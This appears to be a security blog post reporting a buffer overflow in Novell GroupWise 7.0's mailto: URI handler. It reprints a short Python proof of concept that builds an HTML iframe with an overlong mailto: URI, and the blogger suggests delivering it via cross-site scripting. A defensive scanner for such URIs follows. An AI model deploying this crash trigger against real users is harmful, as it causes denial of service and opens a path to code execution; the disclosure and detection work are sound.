Novell GroupWise 'mailto' URI handler buffer overflow vulnerability
Researcher Juan Pablo Lopez Yacubian has reported another URI abuse exploit.
Novell GroupWise is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
This issue affects GroupWise 7.0; other versions may also be affected.
Hmm... When I mentioned URI abuse last week, I said there would be more, didn't I?
I'm working on a few myself. This one is pretty nasty, since most browsers will accept mailto: URIs without any confirmation, meaning you get cross-site scripted, it forces the triggering of a mailto URI, and you're pwned. Game over, thanks for playing.
The researcher attached code to Security Focus as a proof of concept, and here's the actual code from that Python file:
#!/usr/bin/python
# Build an iframe whose mailto: URI is long enough to overflow the handler's buffer
a = "<iframe src='mailto:"
a += "A" * 1530
a += "\x61\x61\x61\x61"
a += "' width='320' height='300' scrolling='yes' name='content'></iframe>"
# Write the page to disk; loading it in a browser hands the URI to the mailto: handler
file = open("test.html", "w")
file.write(a)
file.close()
So, basically, this is a simple Python script that will create the exploit code for you, which you would then deploy using cross-site scripting or host on your own page, whatever. The code does not contain a malicious payload; it's simply a proof of concept to cause the crash, so feel free to play with it if you'd like.
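A defender-side check for the pattern described above, added here as an example and not code from the post, from the researcher or from Novell: it scans HTML for mailto: URIs in src/href attributes and flags any that are oversized, contain non-printable bytes, or sit in an iframe src, which the browser fires without a click. The 512-byte threshold and the sample HTML are assumptions constructed for illustration.

```python
from html.parser import HTMLParser

# Threshold is an assumption for illustration: the PoC above sends 1530+ bytes,
# while a legitimate mailto: link is rarely more than a few hundred characters.
MAX_MAILTO_LEN = 512

class MailtoAuditor(HTMLParser):
    """Collect every mailto: URI found in src/href/action attributes of a page."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("src", "href", "action") and value:
                uri = value.strip()
                if uri.lower().startswith("mailto:"):
                    self.findings.append((tag, uri))

def audit_mailto_uris(html, max_len=MAX_MAILTO_LEN):
    """Return a list of (tag, uri_length, reasons) for suspicious mailto: URIs.

    Flags URIs longer than max_len, URIs carrying bytes outside printable ASCII
    (an address never needs them), and URIs in an iframe src (auto-triggered).
    """
    parser = MailtoAuditor()
    parser.feed(html)
    suspicious = []
    for tag, uri in parser.findings:
        reasons = []
        if len(uri) > max_len:
            reasons.append("oversized")
        if any(ord(c) < 0x20 or ord(c) > 0x7E for c in uri):
            reasons.append("non-printable")
        if tag == "iframe":
            reasons.append("auto-triggered")
        if reasons:
            suspicious.append((tag, len(uri), ",".join(reasons)))
    return suspicious

# Constructed samples: one benign link and one iframe shaped like the PoC output
BENIGN = "<a href='mailto:security@example.com'>Report a bug</a>"
OVERLONG = "<iframe src='mailto:" + "A" * 1530 + "aaaa" + "'></iframe>"

if __name__ == "__main__":
    print(audit_mailto_uris(BENIGN))    # []
    print(audit_mailto_uris(OVERLONG))  # [('iframe', 1541, 'oversized,auto-triggered')]
```

Run at a web proxy or mail gateway, the same function can quarantine pages before the browser ever hands the URI to the handler.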
On to Juan Pablo, congrats to him. He's on a roll. This is the same researcher that earlier this week brought us another Trillian exploit.
-Nate